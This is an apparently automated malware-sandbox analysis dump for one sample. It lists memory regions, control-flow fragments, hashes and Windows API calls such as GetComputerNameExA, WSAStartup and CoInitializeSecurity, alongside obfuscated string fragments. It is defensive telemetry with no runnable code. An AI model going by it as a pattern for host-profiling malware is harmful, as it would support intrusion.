                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID: =<32
                                                                                                                                                                • API String ID: 2994545307-852023076
                                                                                                                                                                • Opcode ID: 71dfa9ca913cde3dc7b49d56f74ddb8b44c3a0038b43af8bbf59f60ec504d641
                                                                                                                                                                • Instruction ID: 26e2db6c952500bf7e5c6e831fc5bf7b2aed5e0cf35089d8db57820ac3a59b9e
                                                                                                                                                                • Opcode Fuzzy Hash: 71dfa9ca913cde3dc7b49d56f74ddb8b44c3a0038b43af8bbf59f60ec504d641
                                                                                                                                                                • Instruction Fuzzy Hash: E831233870830CABE7149B54ACD1BBBB3E6EB84750F18852CF685572E0D771DD859B82
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ,-
                                                                                                                                                                • API String ID: 0-1027024164
                                                                                                                                                                • Opcode ID: d51cc7bd3f59fe164d887a5a4b54ce6d7afd8838f6f6b838983fc39ffb7c72ca
                                                                                                                                                                • Instruction ID: 2fcf86dabca7f07a1e38a1f8d5a1d998e5b7e238da463a82f9a6c5d5a4d62bc7
                                                                                                                                                                • Opcode Fuzzy Hash: d51cc7bd3f59fe164d887a5a4b54ce6d7afd8838f6f6b838983fc39ffb7c72ca
                                                                                                                                                                • Instruction Fuzzy Hash: B42137B1915340CBC7159F2ACC9253BB7B5EF86365F498628E4868B391F734CD05C7A2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 2994545307-2766056989
                                                                                                                                                                • Opcode ID: 2e499589c737e9dee06ffe254bc76a7aee974fb1e1069bc953c90f0afa7a385c
                                                                                                                                                                • Instruction ID: f7590218b9570dd70f2c168abe50ab9a672cfda8e24b4bdf75acc2d6e2915c06
                                                                                                                                                                • Opcode Fuzzy Hash: 2e499589c737e9dee06ffe254bc76a7aee974fb1e1069bc953c90f0afa7a385c
                                                                                                                                                                • Instruction Fuzzy Hash: FC31C0716083088BC314DF58E8D1A6FB7F5EB85314F14892CE69987291D73698498B56
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: bd3e91dc4e487ca97875baf695810a852b9d029a1feadee1d221390d84ee2ec5
                                                                                                                                                                • Instruction ID: cd9d3ae6eb60d89e8b47cdd495b958ba6336ad94588b68f7ca56708e49e887ee
                                                                                                                                                                • Opcode Fuzzy Hash: bd3e91dc4e487ca97875baf695810a852b9d029a1feadee1d221390d84ee2ec5
                                                                                                                                                                • Instruction Fuzzy Hash: 666106356083099BD7159F18D890F3FB7A2EBD5720F19C52CE9858B2E1EB31DC519782
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 51e17ebc42db90c98e5cb4e2d3be0338a2324d50f7aa32a4ef7aef279bd404fe
                                                                                                                                                                • Instruction ID: 034c1299121035d27c78dc67f148540ba22cd4eb75d8f9db081e68ee5501019d
                                                                                                                                                                • Opcode Fuzzy Hash: 51e17ebc42db90c98e5cb4e2d3be0338a2324d50f7aa32a4ef7aef279bd404fe
                                                                                                                                                                • Instruction Fuzzy Hash: 1A5136B5A0C30D4BD728AF68C940A3FB7D6ABD5310F19C96CE685D7391E631AC428B85
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 237503144-0
                                                                                                                                                                • Opcode ID: a4178be2b65fbf6849acfe8d501510c20e1b365491f5dfa7ea2228e80dff76b0
                                                                                                                                                                • Instruction ID: f1843b0be0f634cb2f0ec7cf4b8c8157997462d4b43ab261fe5ebf2e06ede97b
                                                                                                                                                                • Opcode Fuzzy Hash: a4178be2b65fbf6849acfe8d501510c20e1b365491f5dfa7ea2228e80dff76b0
                                                                                                                                                                • Instruction Fuzzy Hash: 3F3118EAF012846BE50A77222C67F7F61574BD0718F08142CF50B2A383ED69FD16969B

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1593 9ed7ee-9ed7f3 1594 9ed7f5-9ed7f9 1593->1594 1595 9ed813-9ed819 1593->1595 1597 9ed800-9ed809 1594->1597 1596 9ed896-9edbfb FreeLibrary call 9ffe00 1595->1596 1602 9edc00-9edc12 1596->1602 1597->1597 1598 9ed80b-9ed80e 1597->1598 1598->1596 1602->1602 1603 9edc14-9edc19 1602->1603 1604 9edc2d 1603->1604 1605 9edc1b-9edc1f 1603->1605 1607 9edc30-9edc72 GetComputerNameExA 1604->1607 1606 9edc20-9edc29 1605->1606 1606->1606 1608 9edc2b 1606->1608 1608->1607
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 009ED898
                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 009EDC43
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                                                                • String ID: ;87>
                                                                                                                                                                • API String ID: 2904949787-2104535307
                                                                                                                                                                • Opcode ID: fd426e555c7897800c9a467897f3ffa0ff471323190d4759b72753a59a011b3a
                                                                                                                                                                • Instruction ID: 6525315b2e1a24f1aac307b12ad644765e9ad60fabb9815ca6fba191d960d58a
                                                                                                                                                                • Opcode Fuzzy Hash: fd426e555c7897800c9a467897f3ffa0ff471323190d4759b72753a59a011b3a
                                                                                                                                                                • Instruction Fuzzy Hash: 9A21F871105782CFDB228F26D850726BFE2AF5B301F288A99D4D68B396D6389C43C751

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1609 9ed893-9edbfb FreeLibrary call 9ffe00 1614 9edc00-9edc12 1609->1614 1614->1614 1615 9edc14-9edc19 1614->1615 1616 9edc2d 1615->1616 1617 9edc1b-9edc1f 1615->1617 1619 9edc30-9edc72 GetComputerNameExA 1616->1619 1618 9edc20-9edc29 1617->1618 1618->1618 1620 9edc2b 1618->1620 1620->1619
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 009ED898
                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 009EDC43
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                                                                • String ID: ;87>
                                                                                                                                                                • API String ID: 2904949787-2104535307
                                                                                                                                                                • Opcode ID: 943f73cf79802ffe91c2b806385ae330e8a700783333cab8885c1176979728e8
                                                                                                                                                                • Instruction ID: 9fbaee9caba1466767ffd11b9e1b3f7b93578d15ddc29ecbe2c30fcf9592d33b
                                                                                                                                                                • Opcode Fuzzy Hash: 943f73cf79802ffe91c2b806385ae330e8a700783333cab8885c1176979728e8
                                                                                                                                                                • Instruction Fuzzy Hash: BC11C4B1101642CFD7128F35DC5076ABBE2FF9B311F29CA94D4D68B292DA349842CB51
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 009C9D98
                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 009C9E78
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                • Opcode ID: 3b71c27fe5c47201247c743e7bb01e58baac258464bb6540bb92d5a32b76a606
                                                                                                                                                                • Instruction ID: 9fffde645f7f6c794e31ef80c2c26bc183a905289ae194fcfe64ab5b78874b7d
                                                                                                                                                                • Opcode Fuzzy Hash: 3b71c27fe5c47201247c743e7bb01e58baac258464bb6540bb92d5a32b76a606
                                                                                                                                                                • Instruction Fuzzy Hash: 2D41D0B4D003449FE7159F789996A9A7F75EB06324F50529CE4902F3A6C631980BCBE2
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 009CF09D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                • Opcode ID: c33cbb0405661ff5f45be6a5c1a504d5eeb306fd0f72642482b90d7bf11f84e7
                                                                                                                                                                • Instruction ID: 4169cab05aef8539026be34e6b60a63ba630c27f9be038379ec96af5b44c69de
                                                                                                                                                                • Opcode Fuzzy Hash: c33cbb0405661ff5f45be6a5c1a504d5eeb306fd0f72642482b90d7bf11f84e7
                                                                                                                                                                • Instruction Fuzzy Hash: 3341C6B4D10B40AFD370EF39994B713BEB8AB05250F504B1EF9E6866D4E231A4198BD7
                                                                                                                                                                APIs
                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 009EDD03
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3545744682-0
                                                                                                                                                                • Opcode ID: 3d201e59fe1b3be424e6a051b6b87c6a48c84d7e1004d717bc6d3b8be6947bae
                                                                                                                                                                • Instruction ID: e344d5ff5c033e102957098ceb323fdc2af7e046344ebc7a1c56ce16edbc4c92
                                                                                                                                                                • Opcode Fuzzy Hash: 3d201e59fe1b3be424e6a051b6b87c6a48c84d7e1004d717bc6d3b8be6947bae
                                                                                                                                                                • Instruction Fuzzy Hash: C621C1B01057D18BD7268F39C4A0732BBE1BF5B344F2896CDD4D38B682CA78A846C761
                                                                                                                                                                APIs
                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 009EDD03
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3545744682-0
                                                                                                                                                                • Opcode ID: 0cf80f791a98703465eb4eaf04828f227b5c53e05257afdf0c3f02e259f1faa8
                                                                                                                                                                • Instruction ID: a3a57fe5ad78b5ddd4f9a134028059ad76c34c7a3612feb46798b6930f0205a4
                                                                                                                                                                • Opcode Fuzzy Hash: 0cf80f791a98703465eb4eaf04828f227b5c53e05257afdf0c3f02e259f1faa8
                                                                                                                                                                • Instruction Fuzzy Hash: F711C4B06047918BD7258B25C860722BBE2BF4A304B2CD69DD4D3CB382CA38D846C761
                                                                                                                                                                APIs
                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000), ref: 009FE0E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 4931c202b1b4cc174eb536050c2e5457b38aeb57f3b6da260696f3fddb8d6818
                                                                                                                                                                • Instruction ID: 718621c27f7d0ec50cf14ed09df3a62ec96bc8de8675b7250b2cfd1928778e73
                                                                                                                                                                • Opcode Fuzzy Hash: 4931c202b1b4cc174eb536050c2e5457b38aeb57f3b6da260696f3fddb8d6818
                                                                                                                                                                • Instruction Fuzzy Hash: 66F0A072828259FBD2106F38BD05B673AA4EFC2720F058834F50496261DE74E81B8791
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 009CECA3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeSecurity
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 640775948-0
                                                                                                                                                                • Opcode ID: 35dc472c44846d70fc586fd3516ee47ebd4be3d923935df5dae09a87a23f7a06
                                                                                                                                                                • Instruction ID: 182e5481bd89d21c0415313f220e3eae6ad4a52a9a8908ba626401b60b34090c
                                                                                                                                                                • Opcode Fuzzy Hash: 35dc472c44846d70fc586fd3516ee47ebd4be3d923935df5dae09a87a23f7a06
                                                                                                                                                                • Instruction Fuzzy Hash: 7EE06C347EA346BAF63992249CA7F2632069B42F28E305B14B3213D6D4DAD03102864D
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                • Opcode ID: 31266b1621ccb7db98da3a68bbf27d7c23f0c95b31ccebb0742da45820a5df9a
                                                                                                                                                                • Instruction ID: 0b51863f857401f330f149a86eafd74e122d7514733cc43b58ca014c9d50235e
                                                                                                                                                                • Opcode Fuzzy Hash: 31266b1621ccb7db98da3a68bbf27d7c23f0c95b31ccebb0742da45820a5df9a
                                                                                                                                                                • Instruction Fuzzy Hash: 13F0DAB4109701CFE344DF28D1A871ABBF4FB88304F10884CE4968B3A0CB75AA49CF82
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                • Opcode ID: 7df65965941694496e93d2ef1f2d420cdf9748dffe424daff4f97619c58806d2
                                                                                                                                                                • Instruction ID: 9ee753018608fbbb9e1dfd78cbd289aadea1c3141db7c95fcea4cbe426f61841
                                                                                                                                                                • Opcode Fuzzy Hash: 7df65965941694496e93d2ef1f2d420cdf9748dffe424daff4f97619c58806d2
                                                                                                                                                                • Instruction Fuzzy Hash: 21F07A745083458FD714DF64C5A871BBBE0BB84308F00891DE5998B390C7B59549CF82
                                                                                                                                                                APIs
                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 009C9ED2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Startup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 724789610-0
                                                                                                                                                                • Opcode ID: a783d87bb38bb6f83944c47d65fb4c52905fd10770f3664d9168ac4fb9fac7d8
                                                                                                                                                                • Instruction ID: 3a9cb82dbfcec376df297055d020b654dd0f12debebb1d4c9ee2b4dfe1f6b9b9
                                                                                                                                                                • Opcode Fuzzy Hash: a783d87bb38bb6f83944c47d65fb4c52905fd10770f3664d9168ac4fb9fac7d8
                                                                                                                                                                • Instruction Fuzzy Hash: 2DE02B33A4060A9BD700EBB0EC67E9E3356DB553417059438E215C5175EA7294139F11
                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,009CB0ED,?), ref: 009FC590
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                • Opcode ID: e9323349b0f25a7c62c35435776d8540769fa48de2e7b9650a13fc535c4e5b82
                                                                                                                                                                • Instruction ID: 331a5d9baaf8c2fd24991fc601a720d7212e407918a7a408394956e600ebce9a
                                                                                                                                                                • Opcode Fuzzy Hash: e9323349b0f25a7c62c35435776d8540769fa48de2e7b9650a13fc535c4e5b82
                                                                                                                                                                • Instruction Fuzzy Hash: 43D01231816136FBC6206F68BC15BD73B54DF49320F074891F5186A1B5C765EC92CBD4
                                                                                                                                                                APIs
                                                                                                                                                                • LdrInitializeThunk.NTDLL(00A012FB,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 009FE13E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 009FC561
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 5bdb91712c1f3a65b505d1ced1b4320d924e60ed5344d3df87aa48c9e9810701
                                                                                                                                                                • Instruction ID: c1f18bee69cb42d47dfd9c05783ccf47c9ede590df340fde523a482edeebc5e6
                                                                                                                                                                • Opcode Fuzzy Hash: 5bdb91712c1f3a65b505d1ced1b4320d924e60ed5344d3df87aa48c9e9810701
                                                                                                                                                                • Instruction Fuzzy Hash: 2DA001711841109ADA566BA4BC09BC4BA25EB58621F128191E111590FAC661D8A29B84
                                                                                                                                                                APIs
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009E43AA
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009E443E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                • API String ID: 237503144-1429676654
                                                                                                                                                                • Opcode ID: 9edfe5ded5b07fe17bdb300181f2c84bf4f99553b2f9b2a5cd581e3742460478
                                                                                                                                                                • Instruction ID: 463a8e2b008b028e5237f4fc9cf355ef2294a13c10effcce1e798522022ced69
                                                                                                                                                                • Opcode Fuzzy Hash: 9edfe5ded5b07fe17bdb300181f2c84bf4f99553b2f9b2a5cd581e3742460478
                                                                                                                                                                • Instruction Fuzzy Hash: 69C20DB560C3848AD334CF54C452BDFBAF2FB82304F00892DD5E96B255D7B54A4A8B9B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
